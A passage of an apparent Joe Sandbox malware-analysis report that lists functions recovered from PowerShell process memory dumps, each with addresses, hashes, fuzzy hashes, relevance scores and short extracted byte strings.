                                                                              • Opcode ID: 39e186c0988e417830aefed286407451f57d8a37d328acb1b2517e99c2a7af12
                                                                              • Instruction ID: a3660e984d141778e68b365063e137920c2ba85a197495264c461a15aaab3b6f
                                                                              • Opcode Fuzzy Hash: 39e186c0988e417830aefed286407451f57d8a37d328acb1b2517e99c2a7af12
                                                                              • Instruction Fuzzy Hash: 5BD12731E1F68D9FE7A6AAA848756B57B91EF52310B0901FED05CCB2E3E918AD01C351
                                                                              Uniqueness

                                                                              Uniqueness Score: -1.00%

                                                                              Function 00007FFD9B969E67 Relevance: .2, Instructions: 156COMMON
                                                                              Download Yara Rule
                                                                              Memory Dump Source
                                                                              • Source File: 00000001.00000002.2287538195.00007FFD9B960000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B960000, based on PE: false
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_1_2_7ffd9b960000_powershell.jbxd
                                                                              Similarity
                                                                              • API ID:
                                                                              • String ID:
                                                                              • API String ID:
                                                                              • Opcode ID: 6417c2c4bc79400a8e1e83bcbff5e58b0562f74989d3ad1884b2a391a90e7171
                                                                              • Instruction ID: df6f407d57a59bd6df15e9f87e251a28df7eab2b9276340755c819b780c79272
                                                                              • Opcode Fuzzy Hash: 6417c2c4bc79400a8e1e83bcbff5e58b0562f74989d3ad1884b2a391a90e7171
                                                                              • Instruction Fuzzy Hash: 55512422F2FA8E9FE7A5DB9C48781B47BD1EF58254B5A00BAD05CC71E3DD289C448301
                                                                              Uniqueness

                                                                              Uniqueness Score: -1.00%

                                                                              Function 00007FFD9B893945 Relevance: .0, Instructions: 49COMMON
                                                                              Download Yara Rule
                                                                              Memory Dump Source
                                                                              • Source File: 00000001.00000002.2286310251.00007FFD9B890000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B890000, based on PE: false
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_1_2_7ffd9b890000_powershell.jbxd
                                                                              Similarity
                                                                              • API ID:
                                                                              • String ID:
                                                                              • API String ID:
                                                                              • Opcode ID: 08da065673a25bdeb927b4c2f952ba14616e05d90be0e25124618a69153761d0
                                                                              • Instruction ID: b79a6eb36e4b3c93bec01bee87a2e2d7b1e4b7860e7d9f7ae7ca8dfb3c7490a4
                                                                              • Opcode Fuzzy Hash: 08da065673a25bdeb927b4c2f952ba14616e05d90be0e25124618a69153761d0
                                                                              • Instruction Fuzzy Hash: E701677121CB0D4FDB48EF0CE451AA5B7E0FB99364F10056DE58AC36A5D636E881CB45
                                                                              Uniqueness

                                                                              Uniqueness Score: -1.00%

                                                                              Non-executed Functions

                                                                              Function 00007FFD9B8989FA Relevance: 5.1, Strings: 4, Instructions: 105COMMON
                                                                              Download Yara Rule
                                                                              Strings
                                                                              Memory Dump Source
                                                                              • Source File: 00000001.00000002.2286310251.00007FFD9B890000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B890000, based on PE: false
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_1_2_7ffd9b890000_powershell.jbxd
                                                                              Similarity
                                                                              • API ID:
                                                                              • String ID: M_^$M_^$M_^$M_^
                                                                              • API String ID: 0-1397233021
                                                                              • Opcode ID: 9e61b2adcc048cc3c87ab020976cfcbb9648badf5b4ea14f387c9800ba023cb3
                                                                              • Instruction ID: 22b3f38bc704dad7561638eba13cb32f5b738020d969fcc7e054a2282d75f986
                                                                              • Opcode Fuzzy Hash: 9e61b2adcc048cc3c87ab020976cfcbb9648badf5b4ea14f387c9800ba023cb3
                                                                              • Instruction Fuzzy Hash: EB3193A2B0BAC75BD71A0779487E094BFA0FF6679474A43F6C0E9470A3ED182A078645
                                                                              Uniqueness

                                                                              Uniqueness Score: -1.00%

                                                                              Executed Functions

                                                                              Function 047CA758 Relevance: .0, Instructions: 27COMMON
                                                                              Download Yara Rule
                                                                              Memory Dump Source
                                                                              • Source File: 00000004.00000002.1992648998.00000000047C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 047C0000, based on PE: false
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_4_2_47c0000_powershell.jbxd
                                                                              Similarity
                                                                              • API ID:
                                                                              • String ID:
                                                                              • API String ID:
                                                                              • Opcode ID: 8084287fbc9a29ce340f3452ea0313a4e1cee196d48b99e95ff2bb7af2c4157f
                                                                              • Instruction ID: c41d6280aaaadbcae2b215065e4e545a50796e82221f766005202fa44f0440d8
                                                                              • Opcode Fuzzy Hash: 8084287fbc9a29ce340f3452ea0313a4e1cee196d48b99e95ff2bb7af2c4157f
                                                                              • Instruction Fuzzy Hash: B9E092727016405BC704EB3DE894AE977A2EBC5340B044656F202CB644DFB4AC428BD1
                                                                              Uniqueness

                                                                              Uniqueness Score: -1.00%

                                                                              Function 073B8C40 Relevance: 20.8, Strings: 16, Instructions: 770COMMON
                                                                              Download Yara Rule
                                                                              Strings
                                                                              Memory Dump Source
                                                                              • Source File: 00000004.00000002.1999021453.00000000073B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 073B0000, based on PE: false
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_4_2_73b0000_powershell.jbxd
                                                                              Similarity
                                                                              • API ID:
                                                                              • String ID: (f~l$(f~l$(f~l$(f~l$(f~l$(f~l$(f~l$(f~l$4'tq$4'tq$4'tq$4'tq$4'tq$4'tq$x.ok$-ok
                                                                              • API String ID: 0-698613372
                                                                              • Opcode ID: 8ff8c6fdbd735636649c320773d3ff1b44e73f267960589dbbdc5e1721f7b63b
                                                                              • Instruction ID: 90176a23a9e8612f216cdf82624e02e9d36ca18db4b62c4d623072ee673dae58
                                                                              • Opcode Fuzzy Hash: 8ff8c6fdbd735636649c320773d3ff1b44e73f267960589dbbdc5e1721f7b63b
                                                                              • Instruction Fuzzy Hash: 156272B0A01219CFEB64CF68C950B9ABBB6BF89310F148199D6096F755CB31ED81CF91
                                                                              Uniqueness

                                                                              Uniqueness Score: -1.00%

                                                                              Function 073B7D80 Relevance: 16.0, Strings: 12, Instructions: 1002COMMON
                                                                              Download Yara Rule
                                                                              Strings
                                                                              Memory Dump Source
                                                                              • Source File: 00000004.00000002.1999021453.00000000073B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 073B0000, based on PE: false
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_4_2_73b0000_powershell.jbxd
                                                                              Similarity
                                                                              • API ID:
                                                                              • String ID: (f~l$(f~l$(f~l$(f~l$(f~l$(f~l$(f~l$(f~l$4'tq$4'tq$tPtq$tPtq
                                                                              • API String ID: 0-3317784659
                                                                              • Opcode ID: e255e6e4d32856a49f63595306b2313101c626b01d46026896a84a831c23dd74
                                                                              • Instruction ID: c4a79e5ea2d562b0907611778a3fb31b0f17c022bb589b50a58045140556343a
                                                                              • Opcode Fuzzy Hash: e255e6e4d32856a49f63595306b2313101c626b01d46026896a84a831c23dd74
                                                                              • Instruction Fuzzy Hash: 4382A3B4B00205CFEB64CBA8C551AEABBB6EF85314F14C169D609AF755CB31EC42CB91
                                                                              Uniqueness

                                                                              Uniqueness Score: -1.00%

                                                                              Function 073B5BC0 Relevance: 15.4, Strings: 12, Instructions: 449COMMON
                                                                              Download Yara Rule
                                                                              Strings
                                                                              Memory Dump Source
                                                                              • Source File: 00000004.00000002.1999021453.00000000073B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 073B0000, based on PE: false
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_4_2_73b0000_powershell.jbxd
                                                                              Similarity
                                                                              • API ID:
                                                                              • String ID: 4'tq$4'tq$4'tq$4'tq$4'tq$4'tq$$tq$$tq$$tq$$tq$$tq$$tq
                                                                              • API String ID: 0-4078996565
                                                                              • Opcode ID: e2592ea02072a477c75150b876fe4157e082881ffb549597dfa1a9a7cebdd44f
                                                                              • Instruction ID: 29cc71d5a6c0c5e31909eab8bbbf6c90498ad740312dde54965a6c2da687fe68
                                                                              • Opcode Fuzzy Hash: e2592ea02072a477c75150b876fe4157e082881ffb549597dfa1a9a7cebdd44f
                                                                              • Instruction Fuzzy Hash: 2DE15DB1718245DFEB358B79C8016EABBB2EFC5211F1480ABD649CF652DB31C851C7A2
                                                                              Uniqueness

                                                                              Uniqueness Score: -1.00%

                                                                              Function 047CD850 Relevance: 10.5, Strings: 8, Instructions: 521COMMON
                                                                              Download Yara Rule
                                                                              Strings
                                                                              Memory Dump Source
                                                                              • Source File: 00000004.00000002.1992648998.00000000047C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 047C0000, based on PE: false
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_4_2_47c0000_powershell.jbxd
                                                                              Similarity
                                                                              • API ID:
                                                                              • String ID: 8N"k$Hxq$h]"k$h]"k$h]"k$$tq$$tq$I"k
                                                                              • API String ID: 0-1354229045
                                                                              • Opcode ID: 23dc39d23e6ce431b7e225b5b37d3cccd881f0d99148181a9c7d67ac9063ff05
                                                                              • Instruction ID: c253588c7289b4ec92cd6f4eea042634a02f30d03fa550a2ce9d3e5fd1c46d11
                                                                              • Opcode Fuzzy Hash: 23dc39d23e6ce431b7e225b5b37d3cccd881f0d99148181a9c7d67ac9063ff05
                                                                              • Instruction Fuzzy Hash: 83223E30B002188FCB65DB25C894BAEB7F2AF89305F1484ADD509AB355DF35AE85CF81
                                                                              Uniqueness

                                                                              Uniqueness Score: -1.00%

                                                                              Function 073BA318 Relevance: 10.3, Strings: 8, Instructions: 339COMMON
                                                                              Download Yara Rule
                                                                              Strings
                                                                              Memory Dump Source
                                                                              • Source File: 00000004.00000002.1999021453.00000000073B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 073B0000, based on PE: false
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_4_2_73b0000_powershell.jbxd
                                                                              Similarity
                                                                              • API ID:
                                                                              • String ID: 4'tq$4'tq$4'tq$4'tq$4'tq$4'tq$x.ok$-ok
                                                                              • API String ID: 0-3755857650
                                                                              • Opcode ID: 464815102ddcfbc27eb66578b22c475ea81b1bd348db15044944b86fef683205
                                                                              • Instruction ID: 4821997821e577ba40506d3569edb559d3631c740398e38ab2a834caf419447f
                                                                              • Opcode Fuzzy Hash: 464815102ddcfbc27eb66578b22c475ea81b1bd348db15044944b86fef683205
                                                                              • Instruction Fuzzy Hash: ADD181B0A00209DFDB24DBA9C554B9EBBB3AF88314F24C059D6056F795CB75EC42CBA1
                                                                              Uniqueness

                                                                              Uniqueness Score: -1.00%

                                                                              Function 073B7798 Relevance: 9.2, Strings: 7, Instructions: 436COMMON
                                                                              Download Yara Rule
                                                                              Strings
                                                                              Memory Dump Source
                                                                              • Source File: 00000004.00000002.1999021453.00000000073B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 073B0000, based on PE: false
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_4_2_73b0000_powershell.jbxd
                                                                              Similarity
                                                                              • API ID:
                                                                              • String ID: (f~l$(f~l$84|l$84|l$tPtq$tPtq$x.ok
                                                                              • API String ID: 0-1386585763
                                                                              • Opcode ID: ee7dafadbd75b10e6851dfcaa6fd9272c65968dcb073fb7dd7af97358d0540f3
                                                                              • Instruction ID: 7fef434b18bfad72505480f2ad1d12e0f3209961bbffcbf3443ec07ce37d9f51
                                                                              • Opcode Fuzzy Hash: ee7dafadbd75b10e6851dfcaa6fd9272c65968dcb073fb7dd7af97358d0540f3
                                                                              • Instruction Fuzzy Hash: 91F1C7B1B002059FD724DBA8C551BAABBB3EFC8310F24846AD609AF755DB31DD41CBA1
                                                                              Uniqueness

                                                                              Uniqueness Score: -1.00%

                                                                              Function 073B92BB Relevance: 9.1, Strings: 7, Instructions: 387COMMON
                                                                              Download Yara Rule
                                                                              Strings
                                                                              Memory Dump Source
                                                                              • Source File: 00000004.00000002.1999021453.00000000073B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 073B0000, based on PE: false
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_4_2_73b0000_powershell.jbxd
                                                                              Similarity
                                                                              • API ID:
                                                                              • String ID: (f~l$(f~l$4'tq$4'tq$x.ok$x.ok$-ok
                                                                              • API String ID: 0-3284569063
                                                                              • Opcode ID: 1649192b95a13c4e681564e1cb91eb869dac911440c29a1bb7cfa8343218fdf5
                                                                              • Instruction ID: 5dccd16f5843e71dfdc9ff791b93ce283eb19615d7ea66df3e22bfcc517aeaf3
                                                                              • Opcode Fuzzy Hash: 1649192b95a13c4e681564e1cb91eb869dac911440c29a1bb7cfa8343218fdf5
                                                                              • Instruction Fuzzy Hash: 2EF183B0B00215DFE764DB68C951FAEBBB3AF88300F108099D6096F795CB75AD818F91
                                                                              Uniqueness

                                                                              Uniqueness Score: -1.00%

                                                                              Function 073B0645 Relevance: 6.6, Strings: 5, Instructions: 352COMMON
                                                                              Download Yara Rule
                                                                              Strings
                                                                              Memory Dump Source
                                                                              • Source File: 00000004.00000002.1999021453.00000000073B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 073B0000, based on PE: false
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_4_2_73b0000_powershell.jbxd
                                                                              Similarity
                                                                              • API ID:
                                                                              • String ID: 4'tq$4'tq$$tq$$tq$$tq
                                                                              • API String ID: 0-2409360608
                                                                              • Opcode ID: 26f35c85503a757ebb8436e8ea7f94a31069e02d23476e1644cfd1d089a65d3a
                                                                              • Instruction ID: 6d0fc3e94eb51c429f274bb957e5d9a1e2954a100a4775fc9b65b99eb92b2fb0
                                                                              • Opcode Fuzzy Hash: 26f35c85503a757ebb8436e8ea7f94a31069e02d23476e1644cfd1d089a65d3a
                                                                              • Instruction Fuzzy Hash: 20B109F17042468FFB399A79C5416EBBBA6EF85210F14806ADA09CFA61DB31C941C7A1
                                                                              Uniqueness

                                                                              Uniqueness Score: -1.00%

                                                                              Function 073BA2FA Relevance: 6.5, Strings: 5, Instructions: 271COMMON
                                                                              Download Yara Rule
                                                                              Strings
                                                                              Memory Dump Source
                                                                              • Source File: 00000004.00000002.1999021453.00000000073B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 073B0000, based on PE: false
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_4_2_73b0000_powershell.jbxd
                                                                              Similarity
                                                                              • API ID:
                                                                              • String ID: 4'tq$4'tq$4'tq$x.ok$-ok
                                                                              • API String ID: 0-2365990516
                                                                              • Opcode ID: ecbab21bdcfa8f48617ce2f038b4bfd4162ba1ae62a4b15c0d1ed996c9e25d77
                                                                              • Instruction ID: c512fb41819bc50c1c6131d281445aa5ff5ea18a3972e31135952c760b9de62f
                                                                              • Opcode Fuzzy Hash: ecbab21bdcfa8f48617ce2f038b4bfd4162ba1ae62a4b15c0d1ed996c9e25d77
                                                                              • Instruction Fuzzy Hash: A2B191B0A00205DFEB24CF99C550B9EBBB2EF88314F14C059D6096FB95CB75E846CB91
                                                                              Uniqueness

                                                                              Uniqueness Score: -1.00%

                                                                              Function 073B2C51 Relevance: 5.5, Strings: 4, Instructions: 454COMMON
                                                                              Download Yara Rule
                                                                              Strings
                                                                              Memory Dump Source
                                                                              • Source File: 00000004.00000002.1999021453.00000000073B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 073B0000, based on PE: false
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_4_2_73b0000_powershell.jbxd
                                                                              Similarity
                                                                              • API ID:
                                                                              • String ID: 4'tq$4'tq$4'tq$4'tq
                                                                              • API String ID: 0-3196592860
                                                                              • Opcode ID: 8582516f08d717c5e9747c199dea67794e6d7706ea2524070b480baf8d36ff11
                                                                              • Instruction ID: 191fd942793b96c65c633d09f4da36a3df5c7d955bd6b92a3ae9840ee7fdd3d2
                                                                              • Opcode Fuzzy Hash: 8582516f08d717c5e9747c199dea67794e6d7706ea2524070b480baf8d36ff11
                                                                              • Instruction Fuzzy Hash: DBE18EF27042568FEB354B7984016EBBBA6EFC5310F1481BAD609CFA51DB31C841C7A2
                                                                              Uniqueness

                                                                              Uniqueness Score: -1.00%

                                                                              Function 073B8104 Relevance: 4.3, Strings: 3, Instructions: 548COMMON
                                                                              Download Yara Rule
                                                                              Strings
                                                                              Memory Dump Source
                                                                              • Source File: 00000004.00000002.1999021453.00000000073B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 073B0000, based on PE: false
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_4_2_73b0000_powershell.jbxd
                                                                              Similarity
                                                                              • API ID:
                                                                              • String ID: (f~l$(f~l$(f~l
                                                                              • API String ID: 0-1417331273
                                                                              • Opcode ID: 686f135128cf903326980236a7a44e08da687af9e8a334ed4e7a44281eaf32f9
                                                                              • Instruction ID: f2cd6f7ffc6f305d7af1713ded80a70783cdccaae930ff376645819566bf9565
                                                                              • Opcode Fuzzy Hash: 686f135128cf903326980236a7a44e08da687af9e8a334ed4e7a44281eaf32f9
                                                                              • Instruction Fuzzy Hash: 0D3248B4A00205CFEB64CB98C550ED9BBB6FB89314F64C199DA09AF755C732EC42CB91
                                                                              Uniqueness

                                                                              Uniqueness Score: -1.00%

                                                                              Function 073B8118 Relevance: 4.3, Strings: 3, Instructions: 541COMMON
                                                                              Download Yara Rule
                                                                              Strings
                                                                              Memory Dump Source
                                                                              • Source File: 00000004.00000002.1999021453.00000000073B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 073B0000, based on PE: false
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_4_2_73b0000_powershell.jbxd
                                                                              Similarity
                                                                              • API ID:
                                                                              • String ID: (f~l$(f~l$(f~l
                                                                              • API String ID: 0-1417331273
                                                                              • Opcode ID: 83c83c77872352e0b9f2dee20d7348a131b6b0a72268100fa468295f85de409a
                                                                              • Instruction ID: ca525987dfaa13cbf284ffa187b775065131027a659ad2cc2519eae2c629ff3c
                                                                              • Opcode Fuzzy Hash: 83c83c77872352e0b9f2dee20d7348a131b6b0a72268100fa468295f85de409a
                                                                              • Instruction Fuzzy Hash: 903249B4A00205CFEB64CB98C550ED9BBB6FB89314F54C199DA09AF755C732EC42CB91
                                                                              Uniqueness

                                                                              Uniqueness Score: -1.00%

                                                                              Function 073B888D Relevance: 4.2, Strings: 3, Instructions: 483COMMON
                                                                              Download Yara Rule
                                                                              Strings
                                                                              Memory Dump Source
                                                                              • Source File: 00000004.00000002.1999021453.00000000073B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 073B0000, based on PE: false
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_4_2_73b0000_powershell.jbxd
                                                                              Similarity
                                                                              • API ID:
                                                                              • String ID: (f~l$(f~l$(f~l
                                                                              • API String ID: 0-1417331273
                                                                              • Opcode ID: f9f6a89f3400cefb2f3d59ce107467ad47ef988f68912f9e6fe916b1423c6dae
                                                                              • Instruction ID: 3b7e0a6d8ad29d30353542f306a602cf466aefe74b01dc1ea04b6f0e32b1c65d
                                                                              • Opcode Fuzzy Hash: f9f6a89f3400cefb2f3d59ce107467ad47ef988f68912f9e6fe916b1423c6dae
                                                                              • Instruction Fuzzy Hash: E8124CB4A00205CFEB24CB98C550EE9BBB6FB89314F54C199DA09AF755C735EC42CB91
                                                                              Uniqueness

                                                                              Uniqueness Score: -1.00%

                                                                              Function 073B6387 Relevance: 2.6, Strings: 2, Instructions: 96COMMON
                                                                              Download Yara Rule
                                                                              Strings
                                                                              Memory Dump Source
                                                                              • Source File: 00000004.00000002.1999021453.00000000073B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 073B0000, based on PE: false
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_4_2_73b0000_powershell.jbxd
                                                                              Similarity
                                                                              • API ID:
                                                                              • String ID: 84|l$tPtq
                                                                              • API String ID: 0-4134024058
                                                                              • Opcode ID: ff95f6942da8a62dc1f3cd50400d39b9b39d006ae4e8281a024b071c73d36744
                                                                              • Instruction ID: 3e633489212b799eb208d87069368f7447a9b97458d22b5f2febca30c448688b
                                                                              • Opcode Fuzzy Hash: ff95f6942da8a62dc1f3cd50400d39b9b39d006ae4e8281a024b071c73d36744
                                                                              • Instruction Fuzzy Hash: 6231E5B0A05265DFD7318B54C801AAAFBB2EF86310F18819AD9499F653C732C845C7A1
                                                                              Uniqueness

                                                                              Uniqueness Score: -1.00%

                                                                              Function 047CE508 Relevance: 2.6, Strings: 2, Instructions: 92COMMON
                                                                              Download Yara Rule
                                                                              Strings
                                                                              Memory Dump Source
                                                                              • Source File: 00000004.00000002.1992648998.00000000047C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 047C0000, based on PE: false
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_4_2_47c0000_powershell.jbxd
                                                                              Similarity
                                                                              • API ID:
                                                                              • String ID: h]"k$I"k
                                                                              • API String ID: 0-1326065732
                                                                              • Opcode ID: b5c933b29321729b2e7ded3b65386505dbf82d4e2a16940959c8744a757178e7
                                                                              • Instruction ID: 6a4ddd9c4eabf7ea8e58f10ad7fba88ff007aae8b14f9785dfd515eb063882c2
                                                                              • Opcode Fuzzy Hash: b5c933b29321729b2e7ded3b65386505dbf82d4e2a16940959c8744a757178e7
                                                                              • Instruction Fuzzy Hash: EB310630A011188FCB26DB64D8956EEB7F2BF89349F1044EDD909AB351DB35AE85CF81
                                                                              Uniqueness

                                                                              Uniqueness Score: -1.00%

                                                                              Function 073B08D8 Relevance: 1.5, Strings: 1, Instructions: 241COMMON
                                                                              Download Yara Rule
                                                                              Strings
                                                                              Memory Dump Source
                                                                              • Source File: 00000004.00000002.1999021453.00000000073B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 073B0000, based on PE: false
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_4_2_73b0000_powershell.jbxd
                                                                              Similarity
                                                                              • API ID:
                                                                              • String ID: $tq
                                                                              • API String ID: 0-2018120210
                                                                              • Opcode ID: 260904b224986e6272eb096368e7ceaeb43d07c82bc4a6b98a4191d5bee895f2
                                                                              • Instruction ID: 4ebe3fdb400ffbbe2420fcee1322aa51a4092d5413815a6e42d14ca629374892
                                                                              • Opcode Fuzzy Hash: 260904b224986e6272eb096368e7ceaeb43d07c82bc4a6b98a4191d5bee895f2
                                                                              • Instruction Fuzzy Hash: 09812BB27042069FEB298B79C8407ABBBB5EFC6310F14846BD559CBA61DB31D841C7A1
                                                                              Uniqueness

                                                                              Uniqueness Score: -1.00%

                                                                              Function 073BA73E Relevance: 1.4, Strings: 1, Instructions: 102COMMON
                                                                              Download Yara Rule
                                                                              Strings
                                                                              Memory Dump Source
                                                                              • Source File: 00000004.00000002.1999021453.00000000073B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 073B0000, based on PE: false
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_4_2_73b0000_powershell.jbxd
                                                                              Similarity
                                                                              • API ID:
                                                                              • String ID: x.ok
                                                                              • API String ID: 0-2233070397
                                                                              • Opcode ID: 5b7c69c96a92f432d26269e83f456b0d7d1a799d0e36b59fec697ef851fe870b
                                                                              • Instruction ID: 7a82373e6313ddb7496c6987b0fa829da21bda560be61ea835004c19636dd307
                                                                              • Opcode Fuzzy Hash: 5b7c69c96a92f432d26269e83f456b0d7d1a799d0e36b59fec697ef851fe870b
                                                                              • Instruction Fuzzy Hash: CF3175B4B401049BE7149BA5C965FAF7BA7DF88710F20C068EA016F795CE75AC428BA1
                                                                              Uniqueness

                                                                              Uniqueness Score: -1.00%

                                                                              Function 073B0659 Relevance: 1.3, Strings: 1, Instructions: 35COMMON
                                                                              Download Yara Rule
                                                                              Strings
                                                                              Memory Dump Source
                                                                              • Source File: 00000004.00000002.1999021453.00000000073B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 073B0000, based on PE: false
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_4_2_73b0000_powershell.jbxd
                                                                              Similarity
                                                                              • API ID:
                                                                              • String ID: $tq
                                                                              • API String ID: 0-2018120210
                                                                              • Opcode ID: 2707c046ac0c0f9a0c8664d2cbd696d9131be7e40c73c72d274e6005d569844a
                                                                              • Instruction ID: c4b4894aa2c9fe2bafd76f7ba36364cb1b6e10e7d88f3679b07aecaca05e5d18
                                                                              • Opcode Fuzzy Hash: 2707c046ac0c0f9a0c8664d2cbd696d9131be7e40c73c72d274e6005d569844a
                                                                              • Instruction Fuzzy Hash: 7AF049F5704206CBFB38CB04D981BA6F362FBC5218F28C16ADA0C1E965EB32D801CB45
                                                                              Uniqueness

                                                                              Uniqueness Score: -1.00%

                                                                              Function 047CC048 Relevance: .3, Instructions: 344COMMON
                                                                              Download Yara Rule
                                                                              Memory Dump Source
                                                                              • Source File: 00000004.00000002.1992648998.00000000047C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 047C0000, based on PE: false
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_4_2_47c0000_powershell.jbxd
                                                                              Similarity
                                                                              • API ID:
                                                                              • String ID:
                                                                              • API String ID:
                                                                              • Opcode ID: ea63965a743ee6867d460b846a5b5acbeaed40a687ed02be625cd97b712e1774
                                                                              • Instruction ID: 7251b3258dd79f3cfa3f0304c79d13f35e7ae6857ae1da9df1ee0e5daf168d94
                                                                              • Opcode Fuzzy Hash: ea63965a743ee6867d460b846a5b5acbeaed40a687ed02be625cd97b712e1774
                                                                              • Instruction Fuzzy Hash: F6E1E874A00209DFDB15CFA9D584AADFBB2FF49310F258559E809AB355C731ED82CB90
                                                                              Uniqueness

                                                                              Uniqueness Score: -1.00%

                                                                              Function 047CADA8 Relevance: .3, Instructions: 317COMMON
                                                                              Download Yara Rule
                                                                              Memory Dump Source
                                                                              • Source File: 00000004.00000002.1992648998.00000000047C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 047C0000, based on PE: false
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_4_2_47c0000_powershell.jbxd
                                                                              Similarity
                                                                              • API ID:
                                                                              • String ID:
                                                                              • API String ID:
                                                                              • Opcode ID: 909067fb51483cac0b0770182955d59279b390434ee41ee7a60707748f430290
                                                                              • Instruction ID: 4b9e073d6b0c5700a0cc9aa314a3158eb74ba9ad7fcea25b600d133a0b8e9ee4
                                                                              • Opcode Fuzzy Hash: 909067fb51483cac0b0770182955d59279b390434ee41ee7a60707748f430290
                                                                              • Instruction Fuzzy Hash: BDC16931A00208CFCB14DFA5E545AADBBB2FF89314F15856DE406AB365DB74BC89CB80
                                                                              Uniqueness

                                                                              Uniqueness Score: -1.00%

                                                                              Function 047C3670 Relevance: .3, Instructions: 313COMMON
                                                                              Download Yara Rule
                                                                              Memory Dump Source
                                                                              • Source File: 00000004.00000002.1992648998.00000000047C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 047C0000, based on PE: false
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_4_2_47c0000_powershell.jbxd
                                                                              Similarity
                                                                              • API ID:
                                                                              • String ID:
                                                                              • API String ID:
                                                                              • Opcode ID: 8814fb6a819f042624e940208d2ac6bf5c78d0335a338005aa74083b4f8ed42a
                                                                              • Instruction ID: fcba5dbbdc5e18fbdca68acfbf094254dee85663287d42a2d4c466fd702feb62
                                                                              • Opcode Fuzzy Hash: 8814fb6a819f042624e940208d2ac6bf5c78d0335a338005aa74083b4f8ed42a
                                                                              • Instruction Fuzzy Hash: 23D10574A01249AFCB05CFA9D484A9DFBB2FF49314F24C159E809AB361D735ED82CB90
                                                                              Uniqueness

                                                                              Uniqueness Score: -1.00%

                                                                              Function 047CC8D0 Relevance: .3, Instructions: 252COMMON
                                                                              Download Yara Rule
                                                                              Memory Dump Source
                                                                              • Source File: 00000004.00000002.1992648998.00000000047C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 047C0000, based on PE: false
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_4_2_47c0000_powershell.jbxd
                                                                              Similarity
                                                                              • API ID:
                                                                              • String ID:
                                                                              • API String ID:
                                                                              • Opcode ID: fc0984ca7f440f9ee758d1d750e346b83158581af7c9c5a5063298b1b5a6ce92
                                                                              • Instruction ID: dc756075613772d5b3a472df28dd059047b5075e09382e174c29c3fedac99e9e
                                                                              • Opcode Fuzzy Hash: fc0984ca7f440f9ee758d1d750e346b83158581af7c9c5a5063298b1b5a6ce92
                                                                              • Instruction Fuzzy Hash: 6CB1F274A00208AFDB15CFA9D484A9DFBB2FF88314F24C159E809AB355D771ED82CB90
                                                                              Uniqueness

                                                                              Uniqueness Score: -1.00%

                                                                              Function 047CAAE0 Relevance: .2, Instructions: 224COMMON
                                                                              Download Yara Rule
                                                                              Memory Dump Source
                                                                              • Source File: 00000004.00000002.1992648998.00000000047C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 047C0000, based on PE: false
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_4_2_47c0000_powershell.jbxd
                                                                              Similarity
                                                                              • API ID:
                                                                              • String ID:
                                                                              • API String ID:
                                                                              • Opcode ID: 39f002d964a4fff1f6430c030aaea2bb6547638e7f640c886640fb7a16071a6f
                                                                              • Instruction ID: 8aa805fda75688d6f5d29ce52e81ae8fb4316a0ace3f85a45409ff3aaea8e271
                                                                              • Opcode Fuzzy Hash: 39f002d964a4fff1f6430c030aaea2bb6547638e7f640c886640fb7a16071a6f
